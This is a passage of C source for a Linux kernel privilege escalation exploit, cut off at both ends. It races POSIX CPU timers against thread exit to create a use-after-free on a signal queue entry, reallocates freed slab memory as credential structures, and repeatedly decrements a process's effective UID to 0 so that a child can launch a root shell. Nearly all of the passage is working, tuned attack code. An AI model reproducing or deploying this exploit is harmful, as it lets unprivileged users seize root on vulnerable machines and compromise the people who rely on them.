SYSCHK(read(cred_child_pfds[0], &m, 1));
}
printf("\t[+] Reallocated other sigqueue's slab as a `struct cred` page\n");
printf("\n[+] Stage 4 - Decrement EUID of target cred to 0\n");
// At this point, SIGUSR2 will have been removed from the task's pending signal mask,
// but SIGRTMIN+1 will still be on it. Set up the UAF sigqueue to use SIGRTMIN+1.
//
// Setting up the `user` pointer to `target_address - 8` gives us an arbitrary
// decrement primitive. Point this to the target cred's EUID offset - 8.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
memset(buf, 0, PAGE_SIZE);
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = uaf_sigqueue_addr; // list->next
*((size_t *)(buf + SIGQUEUE_list_prev_offset)) = uaf_sigqueue_addr;// list->prev
*((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGRTMIN+1; // info->si_code
*((size_t *)(buf + SIGQUEUE_user_offset)) = target_cred_addr + CRED_JAR_euid_offset - 8uLL; // user
write_pipe(realloc_pipefds, SIGQUEUE_user_offset + sizeof(size_t), uaf_sigqueue_offset, buf);
// Arbitrary decrement time! Decrement target cred's EUID to 0. This process
// will have the same UID as the target cred, so we can use that to know
// how many times to decrement.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
for (int i = 0; i < getuid(); i++) {
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
}
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 8
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 9
}
printf("\t[+] Exploit finished. Searching for child with EUID 0...\n");
// Now wake up each child process to check which one is root.
// If we find the root process, we'll block forever and the child
// can launch a shell.
for (int i = 0; i < NUM_CRED_PROCS; i++) {
SYSCHK(write(cred_parent_pfds[1], &m, 1));
SYSCHK(read(cred_child_pfds[0], &m, 1));
}
// If we ever get here, the exploit failed for some reason.
printf("[!!!] Exploit failed! I have no idea why XD try again?\n");
}
int main(int argc, char *argv[]) {
// exploit process
char m;
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(exploit_child_to_parent));
SYSCHK(pipe(exploit_parent_to_child));
pid_t pid = SYSCHK(fork());
if (pid) {
// exploit parent process
pin_on_cpu(0);
close(exploit_child_to_parent[1]);
close(exploit_parent_to_child[0]);
prctl(PR_SET_NAME, "EXPLOIT_PARENT");
pid_t racer_tid;
// Reallocated timer event - use SIGUSR2 as it will be easy to
// tell we won the race if we ever receive SIGUSR2 on the child thread.
//
// Send the signal to ourself specifically, so it uses our pending
// list instead of the shared pending list.
struct sigevent realloc_evt = {0};
realloc_evt.sigev_notify = SIGEV_SIGNAL | SIGEV_THREAD_ID;
realloc_evt.sigev_signo = SIGUSR2;
realloc_evt._sigev_un._tid = (pid_t)syscall(SYS_gettid);
// realloc_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // For debugging
// Create SIGUSR2 sfd, and block SIGUSR2 and SIGRTMIN+1 and SIGRTMIN+2 on this process.
sigset_t block_mask;
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGUSR2);
int sigusr2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));\
sigaddset(&block_mask, SIGRTMIN+1);
sigaddset(&block_mask, SIGRTMIN+2);
SYSCHK(sigprocmask(SIG_BLOCK, &block_mask, NULL));
// itimerspec that fires the time immediately when used with `TIMER_ABSTIME`.
struct itimerspec fire_ts = {0};
fire_ts.it_value.tv_nsec = 1;
int parent_settime_delay = PARENT_SETTIME_DELAY_US;
// int parent_settime_delay = 200 * 1000; // KERNEL PATCH: 200ms delay
// Prepare the preallocs for cross-cache for parent process
// NOTE: Must be on CPU 3!
pin_on_cpu(3);
sigqueue_crosscache_preallocs();
pin_on_cpu(0);
// On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
// This is used later to leak the task pending list address.
pid_t my_pid = (pid_t)syscall(SYS_gettid);
SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));
while (1) {
// Initially pin to CPU 0
pin_on_cpu(0);
// Reset `realloc_timer` on each try.
realloc_timer = (void *) -1;
// Receive child process's RACER thread's TID for reaping later
SYSCHK(read(exploit_child_to_parent[0], &racer_tid, sizeof(pid_t))); // sync 1
// Attach to the RACER thread and continue it
SYSCHK(ptrace(PTRACE_ATTACH, racer_tid, NULL, NULL));
SYSCHK(waitpid(racer_tid, NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, racer_tid, NULL, NULL));
// Signal to child that we attached and continued
SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 2
// Reap the RACER thread.
//
// At this point, this should block while the RACER thread is consuming CPU
// time. There are three possible outcomes:
//
// 1. If the RACER thread exits and enters `handle_posix_cpu_timers()` AFTER
// `do_exit() -> exit_notify()` has woken us up. `waitpid()` will reap the
// RACER thread at that point and allow the timer to be freed.
//
// 2. If the RACER thread fires timers too early, then we'll just wake up
// after the race window is completely gone.
//
// 3. If the RACER thread never fires the timers, we'll also return after the
// race window is completely gone.
SYSCHK(waitpid(racer_tid, NULL, __WALL));
// Assume we won the race for now. Only the child process can tell us for sure.
// Child process will be waiting for us to let it know after `waitpid()` returns.
SYSCHK(write(exploit_parent_to_child[1], &m, 1)); // sync 3
// Child process `free_func()` thread lets us know when it freed the UAF timer so
// we can re-allocate it.
//
// Ensure to switch to CPU 3 before re-allocating.
pin_on_cpu(3);
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 4
// Either `free_func()` sends us SUCCESS, or the child process main thread sends us FAIL.
// In the success case, we are potentially in the race window with a freed timer.
if (m == SUCCESS_CHAR) {
// At this point, we know that the timers fired, because the SUCCESS_STR is only
// sent by the `free_func()` thread.
//
// But we don't know if we won the 1st race or not.
//
// In any case, we re-allocate the UAF timer now, because it prevents hitting the
// `BUG_ON` in `send_sigqueue()` if the timer was actually freed.
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &realloc_evt, &realloc_timer));
// If we assume we won the race, now `realloc_timer->sigq` is the same as `uaf_timer->sigq`,
// and `uaf_timer` is currently being handled by `handle_posix_cpu_timers()` via RACER thread.
//
// We want to wait a certain amount of time to let the RACER thread enter `send_sigqueue()`
// with the `uaf_timer->sigq`, and go past the `!list_empty()` check.
usleep(parent_settime_delay);
// Once past the `!list_empty()` check in `send_sigqueue()`,
// the `signalfd_notify()` is going to extend the 2nd race window for us.
//
// In that 2nd race window, use `timer_settime()` to fire the realloc timer immediately
// by setting the time in the past, and using `TIMER_ABSTIME`.
//
// If we time it just right, the RACER thread's `send_sigqueue()` will be past the
// `!list_empty()` check, and we'll also get past the check before either thread is
// able to insert the `sigqueue` into the target task's pending list.
//
// At this point, if all of it lined up, this same `sigqueue` will be inserted into both
// parent and child's pending lists at the same time.
SYSCHK(timer_settime(realloc_timer, TIMER_ABSTIME, &fire_ts, NULL));
// The child process will tell us whether it received SIGUSR2 or not. This
// is how we know whether we won the first race or not.
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // sync 5
// If the child tells us that it didn't receive SIGUSR2, then there are two
// situations:
//
// 1. We lost the 1st race, so the child received NUM_TIMERS+1 SIGUSR1 signals. This
// means the child never could have seen the SIGUSR2 signal.
// 2. We won the 1st race, but the didn't win the 2nd race. This means the child could
// have seen the SIGUSR2 signal, but since it says it didn't, it means our timer
// fired too early.
//
// In the 2nd case, the signal's `overrun` field will be set to 1.
if (m == FAIL_CHAR) {
// NOTE: no need to poll here, because we'll have the signal here for sure.
// After all, we fired it didn't we? :p
struct signalfd_siginfo si;
SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
// Check for the 2nd case above, did the child receive the SIGUSR2 signal
// after it was already queued into our pending list?
if (si.ssi_overrun > 0) {
// We queued the SIGUSR2 too early into our pending list, so
// increase the `timer_settime()` delay for next time.
printf("\t[+] Parent raced too early, readjusting...\n");
parent_settime_delay += PARENT_SETTIME_DELAY_US_DELTA;